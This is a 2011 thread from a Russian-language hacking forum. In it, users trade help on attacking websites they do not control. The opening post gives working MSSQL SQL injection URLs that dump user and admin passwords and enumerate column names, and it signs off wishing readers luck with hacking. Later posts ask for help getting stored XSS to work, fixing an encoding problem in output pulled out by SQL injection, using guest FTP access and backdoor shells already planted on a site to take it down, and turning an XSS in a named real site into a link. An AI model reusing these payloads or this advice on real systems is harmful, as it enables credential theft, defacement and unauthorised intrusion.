
05.09.2011, 01:00
|
|
Новичок
Регистрация: 18.05.2009
Сообщений: 2
С нами:
8939126
Репутация:
0
|
|
Всем спасибо разобрался))))
Может кому пригодится:
использовал вывод в XML актуально только для MSSQL
hxxp://хост/default.asp?idAccess=1808310+or+1=(SELECT+TOP+100+ pw+FROM+Users+for+xml+auto)-- выводит 100 паролей пользователей в Xml формате очень удобно!
так если hxxp://хост/default.asp?idAccess=1808310+or+1=(SELECT+TOP+1+pw +FROM+Users+where+login='admin'+for+xml+auto)-- выводит только админа))))
а если фильтруется запятая или пишет что URL слишком длинный при том мы пытаемся вытянуть имена полей таблиц использвал такую конструкцию запроса:
hxxp://хост/default.asp?idAccess=1808310+or+1=(select+top+1+co lumn_name+from+information_schema.columns+where+ta ble_name='Users'+and+column_name+not+in+(select+to p+1+column_name+from+information_schema.columns+wh ere+table_name='Users'))--
далее top+1 top+2 top+3 и так далее)))Все удачи во взломах!
PS я ломал не просто так а была необходимость)
|
|
|

07.11.2011, 01:00
|
|
Новичок
Регистрация: 12.09.2011
Сообщений: 24
С нами:
7719446
Репутация:
0
|
|
Кто поможет с XSS активной,у меня скрипт ифрейма не сохраняется в странице уязвимого сайта
IMAGE http://s017.radikal.ru/i420/1111/28/d1f4b87611bd.jpg
|
|
|

13.11.2011, 01:00
|
|
Участник форума
Регистрация: 10.02.2010
Сообщений: 181
С нами:
8553206
Репутация:
5
|
|
Цитата:
Сообщение от Kasper1898
Кто поможет с XSS активной,у меня скрипт ифрейма не сохраняется в странице уязвимого сайта
IMAGE http://s017.radikal.ru/i420/1111/28/d1f4b87611bd.jpg
не понятно что ты хочешь ,
он так не когда не будет работать,
ты не объявил путь до скрипта js в форме
примерно так надо
/js/
вставь его после
но тогда в форме убери action="/js/xss.js
пробуй
|
|
|

14.11.2011, 01:00
|
|
Новичок
Регистрация: 09.04.2010
Сообщений: 0
С нами:
8468691
Репутация:
0
|
|
скрипт после обновления не будет работать полюбому, т.к. js-код выполняется на клиентской машине, а все действия по изменению кода страницы, которые вы делаете - вы делаете у себя. На сервере код не изменяется после редактирования кода, поэтому после обновления страницы ничего не будет.
Kasper1898, внимательно перечитай описание к уязвимости, ты неправильно понял суть эксплуатации.
MOV_EAX, тоже самое.
Код выполняться будет, в простейшем случае, когда, например, на сервере вообще в двиге отключена защита и поставлена опция вроде "интерпретировать посты как js-код", то тогда в пост на форуме можно вписать alert(), и он выполнится. Простейший пример, но неработающий в наше время. Читаем маны.
|
|
|

14.11.2011, 01:00
|
|
Участник форума
Регистрация: 10.02.2010
Сообщений: 181
С нами:
8553206
Репутация:
5
|
|
да согласен ,если он исходный html код страницы сам решил переделать у себя на рабочем столе просто так его тестил конечно нечего не выйдет я то думал он багу нашел
|
|
|

15.11.2011, 01:00
|
|
Постоянный
Регистрация: 17.02.2011
Сообщений: 495
С нами:
8017526
Репутация:
18
|
|
Проблема с кодировкой при выводе инфы при помощи скули
code:
8�|2011-09-27|��� - �� 4.10- �����. � �/�, ������. �.5-8.
Как сделать понятнее?
|
|
|

16.11.2011, 01:00
|
|
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами:
8903558
Репутация:
60
|
|
Переключить кодировку в браузере.
|
|
|

25.11.2011, 01:00
|
|
Познающий
Регистрация: 12.07.2010
Сообщений: 31
С нами:
8334326
Репутация:
-1
|
|
Я просканировала сайт и нашла уязвимость в порте 21: логин - guest, пароль - guest.
Я зашла на сайт через FileFilla, ввела имя хоста, логин и пароль.
Там я обнаружила, что на сайт в разные его папки залиты трои Backdoor.
Что с этим можно сделать, чтобы грохнуть сайт? или изменить его.
Там такие файлы: cgi.php, in.php. shells.php. При открытии cgi.php Касперский выдаёт, что, что это Backdoor эксплойт.
|
|
|

25.11.2011, 01:00
|
|
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами:
8903558
Репутация:
60
|
|
l575, заходить на эти бэкдоры (шеллы) из браузера (если они вообще доступны из веба) и надеяться что на них нет паролей.
Прав записи у ftp пользовеля guest наверняка ведь нет?
|
|
|

14.12.2011, 01:00
|
|
Новичок
Регистрация: 14.12.2011
Сообщений: 2
С нами:
7585526
Репутация:
0
|
|
Прощу прощения за столь ламерскую тему, но вот на сайте нашел XSS http://2sell.com.ua/ там сразу увидите 2 поля поиска, вопрос: Как узнать адресс результата поиска, т.е. я ввожу к примеру "abrakadabra" в поле, и должен перейти по ссылке что-то вроде "http://2sell.com.ua/search-1.php?search=abrakadabra" , но вместо этого в адр. строке стоит "http://2sell.com.ua/search-1.php" и как из этого сформировать ссыль на уязвимость?
Заранее благодарен!
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|